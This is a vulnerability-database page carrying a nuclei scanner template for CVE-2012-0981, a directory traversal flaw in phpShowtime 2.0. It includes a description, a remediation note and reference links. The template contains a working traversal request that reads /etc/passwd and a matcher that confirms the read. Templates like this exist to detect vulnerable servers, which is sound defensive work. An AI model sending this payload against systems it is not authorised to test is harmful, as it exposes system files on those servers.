Lucene search
K

phpShowtime 2.0 - Directory Traversal

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

phpShowtime 2.0 directory traversal vulnerability allows remote attackers to list arbitrary directories and image files via a dot dot in the r parameter to index.php. Exploiting this vulnerability can lead to unauthorized access or sensitive information disclosure

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-0981
31 Jan 201200:00
circl
CVE
CVE-2012-0981
2 Feb 201217:00
cve
Cvelist
CVE-2012-0981
2 Feb 201217:00
cvelist
NVD
CVE-2012-0981
2 Feb 201217:55
nvd
Prion
Directory traversal
2 Feb 201217:55
prion
id: CVE-2012-0981

info:
  name: phpShowtime 2.0 - Directory Traversal
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: |
    Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/18435
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0981
    - http://www.exploit-db.com/exploits/18435
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2012-0981
    cwe-id: CWE-22
    epss-score: 0.1097
    epss-percentile: 0.95318
    cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kybernetika
    product: phpshowtime
  tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b8c887c66a4f35afd8f7fca70bd37042dc480fd49b356d1933fbccbc6fd4b6bb02207cf38abfacfbfcd58228550944c3b8c23569e0f7c1115ee30a890f40153d8964:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 25
EPSS0.1097
30